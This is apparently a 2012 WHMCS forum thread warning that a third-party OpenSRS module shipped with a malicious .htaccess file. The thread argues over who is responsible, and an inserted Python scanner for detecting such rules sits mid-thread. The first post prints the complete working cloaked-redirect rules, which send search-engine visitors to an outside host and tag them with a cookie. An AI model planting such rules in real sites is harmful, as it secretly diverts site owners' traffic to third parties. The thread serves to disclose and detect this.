microvb Posted May 5, 2012

Anyone looking at the HTB (HostTheBest) scripts: please be advised that, after forcing "real" information from you for their script, they contain malicious code. The following was in the .htaccess file inside the "free" version of the OpenSRS balance module; the rest was IonCube encoded, so who knows what other wonders are hidden inside (of course I did not install it after finding this nasty little redirect trojan):

```apache
# exgocgkctswo
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|yahoo\.|bing\.|msn\.|yandex\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|search\.|metacrawler\.|rambler\.|mail\.|dogpile\.|ya\.|\/search\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(q\=cache\.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|ecto|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|****\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|like\sMac\sOS|macDN|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|***axia|ZyBorg).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*xccgtswgokoe.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://gamecomes.org/cgi-bin/r.cgi?p=10003&i=5340175b&j=333&m=4fe092494f0f51b55fa9cba93e291670&h=%{HTTP_HOST}&u=%{REQUEST_URI}&q=%{QUERY_STRING}&t=%{TIME} [R=302,L,CO=xccgtswgokoe:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
# exgocgkctswo
```

I have attached their file so Moderators can review it and hopefully kick these guys in the butt to clean up their code and release something a bit less malicious --- this looks REALLY bad, as it being linked from the Addons section of WHMCS makes it appear that it was approved in some part by the developers of WHMCS --- which I am sure it wasn't. (*** apparently I can't attach it, as I can only upload 97k ... Moderators, please get back to me privately and we can figure out a way to get the file to you so you can see.)

Just a reminder to all those using scripts and plugins to CHECK the code before applying anything blindly. Even when it looks like it comes from a legitimate source, you will find the occasional nasty bugger like this which I am sure probably functions, but is definitely doing things on what would otherwise be your secure server which you do not wish to have done --- making it insecure.
bear Posted May 6, 2012

This is not a server compromise (and I can confirm it exists in the download); it's a redirect to a referral link if someone/thing arrives via the listed search engines, but not if it's the engines themselves. The date on that file was Jan 10, just like most of the files in the download, so it was likely in the directory and packaged along with the addon. That does beg the question as to whether or not his server is compromised, however. I'd be concerned in either case. Deliberate? I doubt it. If it were, wouldn't you find a way to hide something like this in the encrypted pages (not an htaccess, of course, but something to do this another way, possibly)?
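The behaviour bear describes (redirect visitors who arrive from a search engine, skip the engines' own crawlers, and tag each visitor with a cookie so it only fires once) has a recognisable shape in mod_rewrite, and microvb's advice to check an archive before installing it can be partly automated. The following is an added example, not code from the thread, from HTB, or from WHMCS: it opens a module zip in memory, finds every .htaccess inside it, and flags RewriteRule lines that issue an external 30x redirect, noting whether the rule set is gated on a search-engine referer and whether it sets a suppression cookie. The archive contents, the `redirect-host.invalid` target and the `tagcookie` name are all constructed for the demonstration; the `own_hosts` parameter is an assumption so that redirects to your own domains are not reported.

```python
"""Added example (not from the thread or the module): scan a module archive for
.htaccess files whose mod_rewrite rules implement a referer-conditional
("cloaked") redirect to an external host. Sample data is constructed below."""
import io
import re
import zipfile

# Referer test naming search engines, modelled on the structure of the quoted rules.
SEARCH_REFERER_RE = re.compile(r"RewriteCond\s+%\{HTTP_REFERER\}\s+\S*(google|yahoo|bing|yandex)", re.I)
# Negated cookie test: redirect only visitors who have not been tagged yet.
COOKIE_GATE_RE = re.compile(r"RewriteCond\s+%\{HTTP_COOKIE\}\s+!", re.I)
RULE_RE = re.compile(r"RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)


def analyze_htaccess(text, own_hosts=()):
    """Return one list of reasons per suspicious RewriteRule (empty list if clean)."""
    lines = [line.strip() for line in text.splitlines()]
    search_referer = any(SEARCH_REFERER_RE.search(l) for l in lines)
    cookie_gated = any(COOKIE_GATE_RE.search(l) for l in lines)
    allowed = {h.lower() for h in own_hosts}
    findings = []
    for line in lines:
        m = RULE_RE.match(line)
        if not m:
            continue
        target, flags = m.group(2), (m.group(3) or "")
        flag_names = [f.split("=", 1)[0].strip().upper() for f in flags.split(",") if f]
        host_match = re.match(r"https?://([^/?#\s]+)", target, re.I)
        if not host_match or "R" not in flag_names:
            continue  # internal rewrite, or no external redirect flag: not this pattern
        host = host_match.group(1).lower()
        if host in allowed:
            continue
        reasons = ["external redirect to " + host]
        if search_referer:
            reasons.append("conditioned on a search-engine referer")
        if cookie_gated and "CO" in flag_names:
            reasons.append("sets a cookie that suppresses further redirects")
        findings.append(reasons)
    return findings


def scan_archive(zip_bytes, own_hosts=()):
    """Map each .htaccess path inside the zip to its findings."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.rsplit("/", 1)[-1].lower() == ".htaccess":
                text = zf.read(name).decode("utf-8", "replace")
                results[name] = analyze_htaccess(text, own_hosts)
    return results


# Constructed sample mirroring the quoted rule set; the host and cookie name are placeholders.
CLOAKED_HTACCESS = """# constructed sample
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\\:\\/\\/)?([^\\/\\?]*\\.)?(google\\.|yahoo\\.|bing\\.).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bot|Crawl|spider|Google).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*tagcookie.*$
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://redirect-host.invalid/r.cgi?h=%{HTTP_HOST}&u=%{REQUEST_URI} [R=302,L,CO=tagcookie:1:%{HTTP_HOST}:10080:/:0:HttpOnly]
"""
# Constructed benign front-controller rewrite: internal target, no redirect flag.
BENIGN_HTACCESS = """RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^(.*)$ index.php?rp=$1 [QSA,L]
"""


def build_sample_archive():
    """Build an in-memory zip with one clean and one cloaked .htaccess (constructed)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("module/module.php", "<?php // encoded payload placeholder\n")
        zf.writestr("module/.htaccess", BENIGN_HTACCESS)
        zf.writestr("module/lib/.htaccess", CLOAKED_HTACCESS)
    return buf.getvalue()


if __name__ == "__main__":
    for path, findings in scan_archive(build_sample_archive()).items():
        print(("SUSPICIOUS" if findings else "ok").ljust(10), path)
        for reasons in findings:
            print("           - " + "; ".join(reasons))
```

Run it against a real download by replacing `build_sample_archive()` with the bytes of the zip and passing your own hostnames in `own_hosts`; anything reported as an external redirect deserves a manual read of the full rule set before the module goes anywhere near a live server.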
microvb (Author) Posted May 6, 2012

bear: With regards to deliberation, I will agree this is more of an assumption based on the history of lack of communication and the address of the developer company. As the free version is binary encoded, there is no way to tell for sure what harm may be caused by the scripts contained within, and in particular, this one may even be capable of registering, hijacking DNS, or even deleting domains, creating sub-reseller accounts with unlimited permissions, changing the OpenSRS password, and various other potentially destructive tactics related to granting access to OpenSRS alone ---- not to mention the .htaccess redirect function combined with other potential functions in PHP to ensure the redirect happens and/or the .htaccess is not removed (eg, recreating), and so on. The .htaccess is merely an insight into what danger may lie within the rest of the script. I have cleaned up several website viruses which had such behavior, the majority of which were eval()'d or document.write()'d code. Some contained .htaccess files which did this. I have tried contacting the company (over 1 year now), and no response, so I am not entirely sure what to do in this case. Either way, the proposed function of this module would be nice to see officially integrated so that we know it is done in a safe and secure way.

The particular place where the .htaccess file is located in the archive does lead more suspicion towards manual injection rather than automated. As I am sure you are aware, rarely do "attacks" of this nature inject .htaccess into .zip files, and further, when they do propagate, it is usually into every folder which they can write to. I would like to give HTB the benefit of the doubt; however, the lack of response in this matter is rather disconcerting.

Perhaps this thread may operate as an incentive to respond accordingly and/or clean up the code; however, with something of this nature, I would be very hesitant to pursue a closed source (binary encoded) script further. On the positive side, I did not see any negative feedback on "the web", however this too could be the result of very heavy SEO strategies. That being said, here are the Jotti virus scan results -- http://virusscan.jotti.org/en/scanresult/8095f7f8ad9e33104cc4c2ca80ef401b9e9926b3

Lastly, this thread is not intended to bash or demean any company, especially one which is contributing to the community; rather it is intended to bring attention to the community and hopefully the developer to ensure that WHMCS servers are run in a safe and secure manner, without internal exploitation or security holes being intentionally added.
wsa Posted May 6, 2012

My module doesn't use .htaccess, and nobody has emailed me about this kind of problem, that I'd be selling this like it was nothing. I checked with my developer and the OpenSRS API. About free: well, you chose to get it free; there is a paid version that you can get, and it's very cheap, it doesn't cost too much. 90% of my clients buy the source due to the fact that I don't charge too much for the module. If you emailed me, can you provide me the ticket number so I can look into this?
wsa Posted May 6, 2012

OK, I see where this file is coming from now: it is from the OpenSRS files they gave me. I will talk to OpenSRS about this and why that is there.
easyhosting Posted May 6, 2012

> OK, I see where this file is coming from now: it is from the OpenSRS files they gave me. I will talk to OpenSRS about this and why that is there.

I would say, regardless of whether OpenSRS gave this to you, it is you that is distributing this, even though you state:

> My module doesn't use .htaccess

So if this is the case, then why distribute .htaccess in the zip file if your script doesn't use .htaccess?
bear Posted May 6, 2012

> So if this is the case, then why distribute .htaccess in the zip file if your script doesn't use .htaccess?

I'd suggest that's an indication he's not reviewing the files or product before packaging it, and is a serious cause for concern. If that file wasn't noticed, what else has made its way into it that isn't quite so obvious? This interacts with an account that has domains and money connected to it, not to mention access to the WHMCS back end and all of those connections. Scary stuff.
easyhosting Posted May 6, 2012

> I'd suggest that's an indication he's not reviewing the files or product before packaging it, and is a serious cause for concern. If that file wasn't noticed, what else has made its way into it that isn't quite so obvious? This interacts with an account that has domains and money connected to it, not to mention access to the WHMCS back end and all of those connections. Scary stuff.

It is also an indication that he is marketing scripts as if he created them; if he had created the scripts, then why add the .htaccess file in the zip file if it is not used? I think he is purchasing these scripts and then selling them as his own.
wsa Posted May 6, 2012

First, all my scripts are built by my company, and now I will personally check all my developers' work to make sure this never happens again, and let other developers look at it also.
easyhosting Posted May 6, 2012

I think he has problems with other scripts, as some time ago I had his monitoring script to set up my own monitoring service, but all this did was send out spam, to the point that my server provider suspended the domain, with a view to suspending my whole VPS. He did not understand why the domain got suspended etc. Luckily I have a good relationship with my server provider and I promised to remove the domain.
wsa Posted May 6, 2012

I'm sorry, but you are totally wrong; in that case everybody who bought this script would have the same problem. Let's drop this and move on already.
bear Posted May 6, 2012

> all this did was send out spam, to the point that my server provider suspended the domain

Wait, you're saying a monitoring script sent spam emails? What was it advertising?

> Let's drop this and move on already.

It's a serious issue, and dropping it would be a disservice to those that might be affected. Addressing it and making sure everything was cleaned up is a better approach.
wsa Posted May 6, 2012

I already told you I will be checking my developers' work to make sure this doesn't happen again; a lot of developers make bugs, and they get fixed ASAP and we move on. About the monitoring script: it doesn't send spam; if that were the case I would be getting a lot of emails or posts on a lot of forums.
starnetwork Posted May 6, 2012

I have the monitoring script under live-uptime.com and it never sends any spam messages. If you got spam messages, maybe someone hacked your server and added some file that sends out spam or something. But I have the source code edition and I have seen the code; there is no spam code, I can tell you that 100%. You can contact me if you have any additional questions.

Best Regards,
StarNetwork.